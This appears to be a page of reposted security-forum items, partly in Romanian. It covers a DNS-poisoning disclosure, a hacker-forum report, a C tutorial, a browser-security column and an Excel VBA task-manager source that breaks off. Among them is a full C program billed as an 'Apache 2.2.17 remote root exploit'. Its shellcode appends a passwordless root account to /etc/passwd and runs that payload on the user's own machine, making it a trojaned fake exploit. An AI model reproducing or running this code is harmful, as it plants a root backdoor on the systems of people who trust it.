Nytro

DNS Poisoning via Port Exhaustion Hey, Today we are releasing a very interesting whitepaper which describes a DNS poisoning attack against stub resolvers. It discloses two vulnerabilities: 1. A vulnerability in Java (CVE-2011-3552, CVE-2010-4448) which enables remote DNS poisoning using Java applets. This vulnerability can be triggered when opening a malicious webpage. A successful exploitation of this vulnerability may lead to disclosure and manipulation of cookies and web pages, disclosure of NTLM credentials and clipboard data of the logged-on user, and even firewall bypass. 2. A vulnerability in multiuser Windows environments which enables local DNS cache poisoning of arbitrary domains. This vulnerability can be triggered by a normal user (i.e. one with non-administrative rights) in order to attack other users of the system. A successful exploitation of this vulnerability may lead to information disclosure, privilege escalation, universal XSS and more. Whitepaper: http://bit.ly/q31wSq A blog post with video demos: IBM Rational Application Security Insider: DNS poisoning via Port Exhaustion Download: http://blog.watchfire.com/files/dnsp_port_exhaustion.pdf Roee Hay <roeeh () il ibm com>, IBM Rational Application Security Research Group Yair Amit <yairam () gmail com> Sursa: Full Disclosure: DNS Poisoning via Port Exhaustion

Apache 2.2.17 remote root exploit /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and i will find you ~ desg */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char evil[] = "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89" "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89" "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8" "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23" "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74" "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a" "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68" "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44" "\x44\x44"; #define NOP 0x90 #define BSIZE 1000 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>\n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memory\n"); exit(1); } memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '\0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such server\n"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socket\n"); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refused\n"); exit(1); } printf("sending exploit code...\n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!\n"); else printf("sorry, this site isn't vulnerable\n"); printf("waiting for shell.....\n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); while (1) { /* shell */ } } Sau: [C] /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and - Pastebin.com Discutie aici, e posibil sa nu fie exploit: Full Disclosure: Apache 2.2.17 exploit?

Analysis of 250,000 hacker conversations Posted on 17 October 2011. Imperva released a report analyzing the content and activities of an online hacker forum with nearly 220,000 registered members, although many are dormant. This forum is used by hackers for training, communications, collaboration, recruitment, commerce and even social interaction. Commercially, this forum serves as a marketplace for selling of stolen data and attack software. The chat rooms are filled with technical subjects ranging from advice on attack planning to solicitations for help with specific campaigns. This forum is also a place where curious neophytes can find "how-to-hack" tutorials on various methods. The report not only provides insight into hacker psychology, but also details the technical strategies they learn, develop and deploy. "Studying hacker forums is important to providing insights into hacker psychology and technical strategies," explained Imperva CTO Amichai Shulman. "Hacker forums are still not well understood by many in the security community, and we believe that studying and quantifying what happens in these online communities can lead to the development of strategies to combat cybercrime." The findings include: Examples of hacker communications, collaboration, recruitment, commerce and social interaction activities. Attack discussions on this forum increased over the four-year period of analysis, growing an average of 157% year over year between 2007 and 2010. The most discussed topics in this forum from June 2010 to June 2011 were Dos/DDoS attacks, with 22% of discussions, followed by SQL injections, which comprised 19% of all discussions. 25% of discussions from June 2010 to June 2011 focused on "beginning" hacking, with members devoting 6% of their time sharing "how-to" tutorials and discussing basic methodologies, indicating a strong, steady interest from new talent. Mobile hacking has seen very strong growth in this forum from 2007 to 2010, with iPhone hacking leading the way. The complete report is available here: http://www.net-security.org/dl/articles/Imperva_Oct2011.pdf Sursa: Analysis of 250,000 hacker conversations

C development on Linux - Introduction - I. Category: Linux Development Published on Monday, 17 October 2011 13:26 Contents 1. Introduction 1.1. Why C? 2. About C 2.1. History 2.2. Classification 2.3. Our approach 3. The necessary tools 4. The compilation process 5. Example C program 6. Conclusion 1. Introduction What you're just reading is the beginning of series of articles dedicated to development on Linux systems. However, with minor modifications (if any), you will be able to use this knowledge you will get by reading our series on any other system that uses the same tools (OpenIndiana, BSD...). This first article will deal gradually with the intricacies of writing C code on Linux. You are expected to have basic programming knowledge, either on Linux/Unix systems or on other platforms. The idea is that you should know the basics of programming, like what a variable is or how to define a structure. Even though, you will get this information from this article, we won't insist very much on beginner-level concepts. A word of warning: we won't include everything there is to tell about C, because that would take lots of space and of course, we don't actually know everything about C. 1.1. Why C? Some of you might argue that C is not the best beginner-level language ever. Agreed, but again, you're expected to have some basic programming knowledge, for one. Second, C and Unix, and Linux afterwards, are intimately tied together that it only seemed natural to start our development series with C. From the kernel, of which a substantial part of it is written in C, to lots of everyday user-land applications, C is used massively on your Linux system. For example, GTK is based on C, so if you're using Gnome or XFCE applications, you're using C-based applications. C is an old, well-established programming language, vital tool in many parts in the IT world, from embedded systems to mainframes. Therefore, it is only fair to assume that C skills will not only enrich your CV, but they will also help you to solve many issues on your Linux system, that is only if you take this seriously and practice a lot by reading and writing C code. 2. About C 2.1. History C is more than 40 years old, with beginnings at Bell Labs with Brian Kernighan, Dennis Ritchie and Ken Thompson as the "usual suspects." Unix development and C's evolution are intimately linked, as we said, because Unix was initially written in assembly, but that had lots of shortcomings. Therefore, when moving to the PDP-11 as the main hardware platform, the developers started C as the as a core language for Unix. In 1978, Kernighan and Ritchie wrote, "The C Programming Language," a book that is today as it was 20 years ago: THE book on C programming. We heartily recommend you get it. 2.2. Classification There are always people keen on classification of things and of course, programming is no different. Joking aside, since we're at the beginning, we thought you should know that C is a procedural structured programming language, with weak typing. What we just said, in English, is that C uses procedures (the usual name used by C programmers, and the one we'll use as well, is functions however), that it uses a structured approach (think blocks of code) and finally, it supports implicit type conversions. If you don't know what any of the above means, fear not, you'll find out! 2.3. Our approach This article which is just the introductory part and we will regularly publish next parts where each chapter will deal with an important part of the language: variables, pointers, structs, etc. ( subscribe to RSS if you have not done so yet ) At the end of the theoretical part, we will show you a practical example, for which we chose yest, a tiny piece of software written by Kimball Hawkins (thanks, Kimball). We will compile it, then package it for Debian and Fedora systems. Debian developer Andree Leidenfrost will then show you how to submit our new package to Debian repository, making sure we respect all package requirements to be admitted to Debian distribution (thanks, Andree). We recommend you to try our examples on your system, take some time to examine the code and try to make modifications of your own. 3. The necessary tools Before we begin, let us make sure we have all essential tools installed on your Linux system. You will need a compiler, namely gcc, the binutils package and a text editor or an IDE. Whether you choose text editor or some sort of IDE depends largely on your preferences, but more on that later. Depending on your Linux distribution and installation options you have used, you might already have the necessary tools installed. We put together a tiny script to help you see whether you have all mandatory development tools installed: #!/bin/sh gcc -v if [ $? != 0 ]; then echo "GCC is not installed!" fi ld -v if [ $? != 0 ]; then echo "Please install binutils!" fi Save this script as devtoolscheck.sh, run it: $ sh devtoolscheck.sh On my machine I get following output: $ sh devtools.sh Using built-in specs. COLLECT_GCC=gcc COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper Target: x86_64-linux-gnu Configured with: ../src/configure -v --with-pkgversion='Debian 4.6.1-4' --with-bugurl= file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=c,c++,fortran,objc,obj-c++,go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch [config options snipped] Thread model: posix gcc version 4.6.1 (Debian 4.6.1-4) GNU ld (GNU Binutils for Debian) 2.21.52.20110606 Why you need binutils binaries and gcc, you will see shortly. Now let's focus a bit on "editor vs IDE" question. The only thing we will advise you in this respect is "use what you feel comfortable with and disregard what others tell you". This matter is very subjective and it depends on many variables. For example, if you develop (or used to develop) on other operating systems, you might be used to an IDE. You will find many good IDEs on Linux, including Eclipse, Geany, KDevelop or Anjuta. Try installing them to see what you find more suitable. On the other hand, if you want to go the simple editor way, there are lots of options here as well: vi(m), emacs, kate, nano, jed and so on. By searching the Internet you will find a lot of discussions regarding what the best editor is. We say install few of them and find out what suits you best. You are the only judge of this, and it will be a tool you will use frequently, so take your your time, use it, read about it and get familiar with it. Regardless of your choice, we will assume that you have made your choice in regards to the editing tool and you are familiar with its use. 4. The compilation process In simple words, this process is what starts from the source code you wrote and if all goes well the result is an executable binary or a library. Needless to say, there's more to it but it is essential for you to understand the above sentence before you move on. You do not need to memorize all the concepts now as they will become clearer later. At this stage it's only important to get the general idea. Let's say we have the source code written and now we want a compiler to process it and give us the executable binary. The workflow of this process is illustrated on your right. Please note that this is applicable only to C, which is a compiled language, as opposed to interpreted languages (Perl, Python, Shell), and we will refer strictly to gcc and friends for the rest of our guide. As the figure on your right illustrates the preprocessor (cpp) takes your source code, looks for preprocessor instructions (in C, they start with a hash) and if everything looks right, the result is an output understandable by compiler. The compiler (gcc) does all the hard work, including code optimization for the underlying hardware (if you are interested in compiler theory or cross-compilation, there are lots of good books on the subject, but we assume a more beginner level here). The result is assembly code, intimately close to the machine, from which the binaries will be generated (as is the tool). In the end, depending on the options and the code, "ld" will link the executable to all necessary libraries and voila! the end result: your program. If you want to see all the resulting intermediate files, gcc flag -save-temps as will help you to do so. We recommend you read the gcc manual page, at least frugally, and make sure that your compiler us up to date. You will get used to usual gcc flags by reading our examples, but you are expected to know what they do, not just copy and paste commands you see on the screen. 5. Example C program Every self-respecting programming tutorial starts with a "Hello, world" program. This program does nothing else but print "Hello, world!" on the screen, then exits. It's used to illustrate the very basic structure of a program and some essential concepts. So, without further ado, here it is. #include <stdio.h> /* This is a comment */ int main() { printf("Hello, world!\n"); return 0; } Now, let us dissect the program line by line and see what each line represents. The first one is a preprocessor directive (see above) which asks for the stdio.h file, which provides the definition for the printf function. Header files are files that usually contain various definitions (functions, variables...) and make .c files less cluttered. All what a source file (.c) will need is an #include statement and possibly an argument to the linker. Everything that's defined in the included header file will be available in your source code. main() is a mandatory function in every C program. As the name states, the main activity will happen here, regardless of how many functions you have defined. int main() means that this function does not have any arguments (the empty parentheses) and that it returns an integer (the initial int). All these will be discussed later. The most important thing here is the printf function, which takes our text as an argument and displays it. "\n" means "newline" and it's the equivalent of using the Enter key (or ^M). It is called an escape sequence and all escape sequences in C begin with "\". For example, to better understand what an escape sequence is, imagine you're writing HTML code and you need to print a "<" character. HTML's syntax uses angle brackets to define HTML tags, so chances are your bracket will be interpreted as HTML code instead of being displayed. So, what to do? We escape it with "<" and it will appear properly. Just the same, if you want to insert a newline character, you can't type it directly, as the compiler could care less if you write your program on a single line or not and therefore you you need to escape your new line character with "\n". return 0 tells the compiler that everything is ok and the execution of main() function ends there. That is because 0 is the code for successful execution, while values greater than 0 (integers) is an indication that something went wrong. The curly braces that begin and end the main function delimit its' execution block, that is, what happens in main(), stays in main(). You may have noticed the semicolons at the end of the statements: they are mandatory as a sign that the current statement ended there, but they are not to be used in preprocessor directives as #include. 6. Conclusion We hope we didn't cram too much information in your brain and that you will enjoy staying with us on this programming tutorial. Part 2 will be dealing with a comparison between C and other programming languages in order to help those who already have some experience in development. So make sure you are subscribed to our RSS feed so you'll know when part two arrives. Here's what you should expect: I. C development on Linux - Introduction II. Comparison between C and other programming languages III. Types, operators, variables IV. Flow control V. Functions VI. Pointers and arrays VII. Structures VIII. Basic I/O IX. Coding style and recommendations X. Building a program XI. Packaging for Debian and Fedora XII. Getting a package in the official Debian repositories We reserve the right to alter the list at any time necessary. Seriously, although this is a rough overview of what's to come, we might change our mind regarding titles or subtopics, but the general idea will be as above. [EDIT]: Today, 08.10.2011, marks the sad event of Dennis Ritchie passing away after a long struggle with illness. We cannot even begin to comprise the influence he had on the IT industry. Dennis, we owe you so much. This guide is dedicated to your memory. May you rest in peace. About Author: Rares Aioanei I'm using Linux/BSD since about 2003, passionate about everything that involves Linux/BSD and Free Software. Contributor to various FOSS projects and your average system administrator in everyday life. Sursa: C development on Linux - Introduction - I.

Rahat. Inca una dintre miile de porcarii care circula pe mail/messenger sau chiar Facebook. Nu exista bine/rau, lumina/intuneric, practic nu exista prea multe chestii. De exemplu, lumina nu exista, exista fotoni care se propaga cu viteza luminii (in vid), care la contactul cu materia (pentru noi solida) se "reflecta", ajung in ochii oamenilor prosti care "Uaaa, lumina de la Dumnezeeeeu". Iar culorile sunt doar modul diferit prin care se "reflecta" acesti fotoni la contactul cu alte suprafete, in functie de suprafata respectiva. Discutia e penibila si e inventata (nu cred ca gresesc cand spun asta) de un ratat: o persoana care e paralela si cu religia si cu stiinta. Dumnezeu nu e nici bun nici rau, e neutru daca putem spune asa (religios vorbind, iar ca exemplu: potopul - va explicati voi). Iar chestia cu cele 5 simturi, stiintific e o porcarie ilogica, folosita irational. " Foloseste electricitatea si magnetismul, dar NIMENI nu a vazut*sau nu a inteles pe deplin vreuna din acestea dou" Ia bagati mainile in priza copii fara viitor, nu poate sa va ucida ceva ce nu exista (nu are miros, nu are coaie...) In fine, inca un rahat pe pamant, creat pentru oameni inapti. Iar Einstein e acolo doar pentru marketing, daca nu era acel rand va durea in cur de acest text.

Eu am discutat cu el si e vorba de ceva serios. Va rog, fara comentarii aberante si inutile.

Internet Explorer is the safest Web browser!? Ha! By Steven J. Vaughan-Nichols | October 12, 2011, 8:46am PDT Summary: Microsoft is trying again to con people into thinking that Internet Explorer is the safest browser around. It's not. At best, it's tied with Chrome. Microsoft has always been fond of paying analysts to say that its products are best, or having partners release reports showing how their rivals' products are second-rate, and, now, Web sites that "show" how Internet Explorer (IE) is better than Chrome and Firefox when it comes to security. Really? Didn't Microsoft just release yet another major Internet Explorer patch? I quote from the IE patch update (MS11-081), which apples to all currently supported versions of Microsoft Windows and Internet Explorer and IE 6 as well: "The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights." Yes, that includes IE 9, the best and most up-to-date IE which is only available on Windows 7. Isn't it funny how Microsoft claims that IE 9 is the most secure of its browser family, but somehow it has to have the same problems fixed that exist in IE 6, 7, and 8? Could it be that it's really not that different after all from the rest of its historically insecure family? If you go to Microsoft's Web browser security "test" site, Your Browser Matters though, it will tell you that IE 9, with a score of four, is the most secure browser of all. Funny, it told me that it was the most secure both before and after the patch. As for the other browsers, it informs me that Firefox 7.01 only rates a 2, and Chrome 14 gets a 2.5. And, this I might add, were my scores on my Mint Linux desktop! How can they produce such clearly nonsensical results? It's because they're setting the rules on what's important and what's not. So, for example, Microsoft give IE full credit for its SmartScreen malware detection software. With SmartScreen, software that signed with a digital certificate that Microsoft trusts is allowed to be saved or ran. Chrome, on the other hand, blocks known malware, but lets you save unknown, potentially dangerous programs. On the other hand, if you do download malware with Chrome, the program is still stuck in a sandbox, where it has very limited abilities to actually attack your system. Besides that, Chrome automatically upgrades browser extensions as security fixes come out. Since programs like Adobe Flash are often used for attacks these days, and in Flash's case there have been 17 significant patches in the last 16 months, I think automatic security updates for Flash and other potential problem programs are a big deal. While Microsoft acknowledges that it doesn't provide these important features, it doesn't take away any points for lacking them from its perfect score. Interesting judgement call there Microsoft. Johnathan Nightingale, Mozilla's director of Firefox engineering, also has trouble with what factors Microsoft considers important and what it doesn't. "Mozilla is fiercely proud of our long track record of leadership on security. We believe that being safe on the Web means having a robust browser that defends against malware and phishing, includes new technologies to help sites and users secure themselves, and a responsive security team that gets security updates out quickly and reliably. Microsoft's site is more notable for the things it fails to include: security technologies like HSTS [HTTP Strict Transport Security], privacy tools like Do Not Track, and vendor response time when vulnerabilities are discovered," said Nightingale. Exactly so. Firefox has long been a leader in browser security. True, Microsoft has gotten a lot better about security, but Firefox was doing it when the horribly unsafe IE 6 was still the best Microsoft could do. True, today. you can make Windows and IE relatively safe. No, really you can. All you have to do is constantly and regularly patch it. Those of us who use other operating systems, like Linux and Mac OS X, and alternative browsers such as Chrome and Firefox, can sit back and relax more. Don't get me wrong. We must patch our software as well. As security guru Bruce Schneier points out, "Security is a process, not a product." Security also isn't something though that you measure by a Web site that, when you get down to it, simply checks to see what your browser you're running is IE 9 or not. Deciding what's a secure Web browser a lot more complicated than that. Personally, thanks to Chrome's auto-updating and sandboxing, I feel a lot safer running Chrome on Windows than I ever will running IE. Sursa: http://www.zdnet.com/blog/networking/internet-explorer-is-the-safest-web-browser-ha/1546

TaskManager Runs on 64-bit Excel Filed under: My Software - Didier Stevens @ 11:21 I’m releasing a new version of TaskManager.xls that runs on Excel 2010 64-bit too. The previous version ran on 64-bit Windows, provided you used Excel 32-bit. But this new version runs on both implementations of Excel. Download: http://didierstevens.com/files/software/TaskManager_V0_1_0.zip Dupa cum poate stiti, Excel ofera un Visual Basic Editor in care puteti crea macro-uri folosind VB. Se pare ca cineva a facut un Task Manager. Bine, ca sa functioneze, trebuie sa se execute acele macro-uri: Tools > Options > Security > Advanced si Low la Macro (nu recomand). Cod sursa: ' TaskManager.xls v0.1.0 ' Non-exhaustive list of sources: ' http://www.ex-designz.net/apidetail.asp?api_id=351 ' http://www.xtremevbtalk.com/archive/index.php/t-248755.html ' http://msdn.microsoft.com/en-us/library/ms684335%28v=vs.85%29.aspx ' ' http://didierstevens.com ' Use at your own risk ' ' Shortcommings, or todo's ;-) ' ' History: ' 2011/02/02: start ' 2011/02/04: v0.0.2 added GetTimes ' 2011/02/21: v0.0.3 added GetType ' 2011/02/22: added GetProcessFilename ' 2011/02/23: added AdjustTokenForDebug ' 2011/10/09: v0.1.0 added support for 64-bit Excel Option Explicit Private Const TH32CS_SNAPHEAPLIST = &H1 Private Const TH32CS_SNAPPROCESS = &H2 Private Const TH32CS_SNAPTHREAD = &H4 Private Const TH32CS_SNAPMODULE = &H8 Private Const TH32CS_INHERIT = &H80000000 Private Const MAX_PATH = 260 Private Const INVALID_HANDLE_VALUE = -1& Private Const PROCESS_TERMINATE = &H1 Private Const PROCESS_QUERY_INFORMATION = &H400 Private Const PROCESS_VM_READ = &H10 Private Const THREAD_SUSPEND_RESUME = &H2 Private Const TOKEN_QUERY = &H8 Private Const TokenUser = 1 Private Const TOKEN_ADJUST_PRIVILEGES = &H20 Private Const SE_PRIVILEGE_ENABLED = &H2 #If Win64 Then Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32DefaultHeapIDB As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long pcPriClassBaseB As Long dwFlags As Long szExeFile As String * MAX_PATH End Type #Else Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * MAX_PATH End Type #End If Private Type THREADENTRY32 dwSize As Long cntUsage As Long th32ThreadID As Long rh32OwnerProcessID As Long tpBasePri As Long tpDeltaPri As Long dwFlags As Long End Type Private Type FILETIME dwLowDateTime As Long dwHighDateTime As Long End Type Private Type SYSTEMTIME wYear As Integer wMonth As Integer wDayOfWeek As Integer wDay As Integer wHour As Integer wMinute As Integer wSecond As Integer wMilliseconds As Integer End Type #If Win64 Then Private Type SYSTEM_INFO wProcessorArchitecture As Integer wReserved As Integer lpMinimumApplicationAddress As LongPtr lpMaximumApplicationAddress As LongPtr dwActiveProcessorMask As Long dwNumberOfProcessors As Long dwProcessorType As Long dwAllocationGranularity As Long wProcessorLevel As Long wProcessorRevision As Long End Type #Else Private Type SYSTEM_INFO wProcessorArchitecture As Integer wReserved As Integer lpMinimumApplicationAddress As Long lpMaximumApplicationAddress As Long dwActiveProcessorMask As Long dwNumberOfProcessors As Long dwProcessorType As Long dwAllocationGranularity As Long wProcessorLevel As Long wProcessorRevision As Long End Type #End If Private Type LUID lowpart As Long highpart As Long End Type Private Type TOKEN_PRIVILEGES PrivilegeCount As Long LuidUDT As LUID Attributes As Long End Type #If Win64 Then Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As LongLong, ByVal lProcessID As LongLong) As LongPtr Private Declare PtrSafe Sub CloseHandle Lib "kernel32" (ByVal hPass As LongPtr) Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As LongPtr, sPE32 As PROCESSENTRY32) As Long Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As LongPtr, sPE32 As PROCESSENTRY32) As Long Private Declare PtrSafe Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Boolean, ByVal dwProcId As Long) As LongPtr Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Long) As Long Private Declare PtrSafe Function Thread32First Lib "kernel32" (ByVal hSnapshot As LongPtr, uProcess As THREADENTRY32) As Long Private Declare PtrSafe Function Thread32Next Lib "kernel32" (ByVal hSnapshot As LongPtr, uProcess As THREADENTRY32) As Long Private Declare PtrSafe Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Boolean, ByVal dwThreadId As Long) As LongPtr Private Declare PtrSafe Function SuspendThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Integer Private Declare PtrSafe Function ResumeThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Integer Private Declare PtrSafe Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As LongPtr, ByVal DesiredAccess As Long, ByRef TokenHandle As LongPtr) As Long Private Declare PtrSafe Function GetTokenInformation Lib "advapi32.dll" (ByVal TokenHandle As LongPtr, ByVal TokenInformationClass As Long, TokenInformation As Any, ByVal TokenInformationLength As Long, ByRef ReturnLength As Long) As Long Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef pTo As Any, ByRef uFrom As Any, ByVal lSize As LongLong) Private Declare PtrSafe Function LookupAccountSid Lib "advapi32.dll" Alias "LookupAccountSidA" (ByVal lpSystemName As String, ByVal Sid As Long, ByVal name As String, cbName As Long, ByVal ReferencedDomainName As String, cbReferencedDomainName As Long, peUse As Long) As Long Private Declare PtrSafe Function GetProcessTimes Lib "kernel32" (ByVal hProcess As LongPtr, lpCreationTime As FILETIME, lpExitTime As FILETIME, lpKernelTime As FILETIME, lpUserTime As FILETIME) As Long Private Declare PtrSafe Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long Private Declare PtrSafe Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long Private Declare PtrSafe Function IsWow64Process Lib "kernel32" (ByVal hProcess As LongPtr, ByRef Wow64Process As Long) As Long Private Declare PtrSafe Sub GetNativeSystemInfo Lib "kernel32" (ByRef lpSystemInfo As SYSTEM_INFO) Private Declare PtrSafe Function GetProcessImageFileName Lib "psapi" Alias "GetProcessImageFileNameA" (ByVal hProcess As LongPtr, ByVal lpFilename As String, ByVal nSize As LongLong) As Long Private Declare PtrSafe Function K32GetProcessImageFileName Lib "kernel32" Alias "K32GetProcessImageFileNameA" (ByVal hProcess As LongPtr, ByVal lpFilename As String, ByVal nSize As LongLong) As Long Private Declare PtrSafe Function QueryDosDevice Lib "kernel32" Alias "QueryDosDeviceA" (ByVal lpDeviceName As String, ByVal lpTargetPath As String, ByVal ucchMax As Long) As Long Private Declare PtrSafe Function GetCurrentProcess Lib "kernel32" () As LongPtr Private Declare PtrSafe Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long Private Declare PtrSafe Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As LongPtr, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long #Else Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long) Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, sPE32 As PROCESSENTRY32) As Long Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, sPE32 As PROCESSENTRY32) As Long Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Boolean, ByVal dwProcId As Long) As Long Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Private Declare Function Thread32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As THREADENTRY32) As Long Private Declare Function Thread32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As THREADENTRY32) As Long Private Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Boolean, ByVal dwThreadId As Long) As Long Private Declare Function SuspendThread Lib "kernel32.dll" (ByVal hThread As Long) As Integer Private Declare Function ResumeThread Lib "kernel32.dll" (ByVal hThread As Long) As Integer Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long Private Declare Function GetTokenInformation Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal TokenInformationClass As Long, TokenInformation As Any, ByVal TokenInformationLength As Long, ByRef ReturnLength As Long) As Long Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef pTo As Any, ByRef uFrom As Any, ByVal lSize As Long) Private Declare Function LookupAccountSid Lib "advapi32.dll" Alias "LookupAccountSidA" (ByVal lpSystemName As String, ByVal Sid As Long, ByVal name As String, cbName As Long, ByVal ReferencedDomainName As String, cbReferencedDomainName As Long, peUse As Long) As Long Private Declare Function GetProcessTimes Lib "kernel32" (ByVal hProcess As Long, lpCreationTime As FILETIME, lpExitTime As FILETIME, lpKernelTime As FILETIME, lpUserTime As FILETIME) As Long Private Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME, lpLocalFileTime As FILETIME) As Long Private Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME, lpSystemTime As SYSTEMTIME) As Long Private Declare Function IsWow64Process Lib "kernel32" (ByVal hProcess As Long, ByRef Wow64Process As Long) As Long Private Declare Sub GetNativeSystemInfo Lib "kernel32" (ByRef lpSystemInfo As SYSTEM_INFO) Private Declare Function GetProcessImageFileName Lib "psapi" Alias "GetProcessImageFileNameA" (ByVal hProcess As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare Function K32GetProcessImageFileName Lib "kernel32" Alias "K32GetProcessImageFileNameA" (ByVal hProcess As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare Function QueryDosDevice Lib "kernel32" Alias "QueryDosDeviceA" (ByVal lpDeviceName As String, ByVal lpTargetPath As String, ByVal ucchMax As Long) As Long Private Declare Function GetCurrentProcess Lib "kernel32" () As Long Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long #End If Private dicDevices As Dictionary Private Function StartsWith(ByVal strValue As String, ByVal strStartingValue As String) As Boolean StartsWith = Left(strValue, Len(strStartingValue)) = strStartingValue End Function Private Function EndsWith(ByVal strValue As String, ByVal strEndingValue As String) As Boolean EndsWith = Right(strValue, Len(strEndingValue)) = strEndingValue End Function Private Function GetProcessOwner(ByVal lProcessID As Long) As String #If Win64 Then Dim hProcess As LongPtr Dim hToken As LongPtr #Else Dim hProcess As Long Dim hToken As Long #End If Dim lAccountName As Long Dim lDomainName As Long Dim peUse As Long Dim lNeeded As Long Dim abBuffer() As Byte Dim lpSid As Long Dim lpString As Long Dim strAccountName As String Dim strDomainName As String GetProcessOwner = "" hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, lProcessID) If hProcess <> 0 Then If OpenProcessToken(hProcess, TOKEN_QUERY, hToken) <> 0 Then GetTokenInformation hToken, TokenUser, 0, 0, lNeeded ReDim abBuffer(0 To CLng(lNeeded)) If GetTokenInformation(hToken, TokenUser, abBuffer(0), 